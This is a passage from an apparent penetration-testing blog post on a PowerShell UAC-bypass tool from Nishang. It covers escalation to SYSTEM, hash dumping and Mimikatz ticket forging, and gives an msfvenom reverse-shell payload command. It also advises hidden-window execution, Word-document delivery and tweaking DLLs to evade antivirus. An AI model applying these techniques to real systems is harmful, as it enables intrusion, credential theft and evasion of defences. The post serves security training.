<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjige-Fmt0z8SztPoPGrdzRQZVfG1elOHgIXVS0jrLHWY6rBkMIncpqSB1AxdlIgNEgbBbwNZu99JwT1oenMPlew9h85JVr7GlhBXmaAI71B8UHAav3sTxhVGVOOGQ3EL_ANJm278NMF78/s1600/UAC_Hashes.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="210" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjige-Fmt0z8SztPoPGrdzRQZVfG1elOHgIXVS0jrLHWY6rBkMIncpqSB1AxdlIgNEgbBbwNZu99JwT1oenMPlew9h85JVr7GlhBXmaAI71B8UHAav3sTxhVGVOOGQ3EL_ANJm278NMF78/s400/UAC_Hashes.png" width="400" /></a></div>
Awesome! We successfully bypassed UAC and elevated our privileges. To verify it, we ran Get-PassHashes from <a href="https://github.com/samratashok/nishang/tree/master/powerpreter">Powerpreter</a>.<br />
<br />
Once we have elevated privileges, we can always elevate to SYSTEM using Enable-DuplicateToken from Nishang/Powerpreter. <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3QNQt3HGsbUGyXpDDBmrEqmfpsASgR79x8cSdyauKMB61n7ObuyPf05vhST2P87Fg2qlA22uF-gduunJ706B_pkjD8RCtSG_XLGhtf3CR3vPRmw4aT7WnJu9X2cSJfcKgA45mu2upNI/s1600/SYSTEM.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgR3QNQt3HGsbUGyXpDDBmrEqmfpsASgR79x8cSdyauKMB61n7ObuyPf05vhST2P87Fg2qlA22uF-gduunJ706B_pkjD8RCtSG_XLGhtf3CR3vPRmw4aT7WnJu9X2cSJfcKgA45mu2upNI/s400/SYSTEM.png" width="400" /></a></div>
Bingo!<br />
<br />
In fact, after getting SYSTEM privileges we can use <a href="https://github.com/mattifestation/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1">Invoke-Mimikatz</a> from PowerSploit to use domain tokens as well. Get your Golden/Silver tickets right here! In case you cannot pull scripts from a web server as in the above example, use Invoke-Encode to encode them as compressed base64 and use the result with the -EncodedCommand (or -e) parameter of powershell.exe. You may like to use the '-WindowStyle hidden' parameter of PowerShell to avoid showing any pop-ups to the user.<br />
<br />
There are limitless opportunities with this. Although Metasploit has its own implementation of <a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/local/bypassuac_injection.rb">UAC bypass</a>, we can also use Invoke-PsUACme to get a meterpreter with elevated privileges. A PowerShell meterpreter can be generated using msfvenom: ./msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.230.154 -f psh-reflection<br />
<br />
I can never stop stressing how useful PowerShell is for pen testing Windows networks. For example, we can also use Invoke-PsUACme as a payload in the initial <a href="http://www.labofapenetrationtester.com/2014/11/powershell-for-client-side-attacks.html">client-side attacks</a>. Let's use Invoke-PsUACme with Out-Word from Nishang, making the function call from within the Invoke-PsUACme script itself to avoid an unnecessarily complex command. <br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2t6pKw0EUWmKkzH_B-0jN4m2Y9tmQd27WXEKrjs_H9-9Lye5MshSBkmyTnpfD3pezG81MEWdvio2Vd4LtSwXKV1StElIqcnXiDeMsuubUqJrMhSosyIpv9lt37TM6oP8WqYdmAPuMO0/s1600/ClientSide.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="168" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjx2t6pKw0EUWmKkzH_B-0jN4m2Y9tmQd27WXEKrjs_H9-9Lye5MshSBkmyTnpfD3pezG81MEWdvio2Vd4LtSwXKV1StElIqcnXiDeMsuubUqJrMhSosyIpv9lt37TM6oP8WqYdmAPuMO0/s400/ClientSide.png" width="400" /></a></div>
Sweet! An elevated interactive reverse PowerShell shell. <br />
<br />
As you can see, implementing existing techniques in PowerShell is very rewarding: it deepens one's understanding not only of PowerShell but of the technique as well.<br />
<br />
<h4>
Limitations </h4>
<br />
Since Invoke-PsUACme is based on the UACME project, which itself implements techniques used by malware, there is a chance that the DLLs it drops will be detected by AV in the future. Going by the past record, minor changes in the DLL source should solve this problem whenever it arises.<br />
<br />
Wusa.exe on Windows 10 has no "extract" option. Therefore, Invoke-PsUACme does not work on Windows 10 currently. Please feel free to implement IFileOperation or any other method. I welcome pull requests.<br />
<br />
There are other implementations of UAC bypass in PowerShell as well; see <a href="http://www.powershellempire.com/?page_id=380">http://www.powershellempire.com/?page_id=380</a><br />
<br />
To learn more about UAC bypasses, see the links below:<br />
<a href="https://www.greyhathacker.net/?p=796">https://www.greyhathacker.net/?p=796</a><br />
<a href="http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html">http://www.pretentiousname.com/misc/W7E_Source/win7_uac_poc_details.html</a><br />
<br />
Hope you enjoyed the post!<br />
<br />
<h4>
Shameless self promotion</h4>
<div style="text-align: justify;">
If you liked the post and want to learn more and/or want to support my research and work, join me for a two-day training "PowerShell for Penetration Testers" at:</div>
<div style="text-align: left;">
<b>DeepSec, Vienna (November 17-18th, 2015)</b> - <a href="https://deepsec.net/speaker.html#WSLOT192">https://deepsec.net/speaker.html#WSLOT192</a></div>
</div>
</div>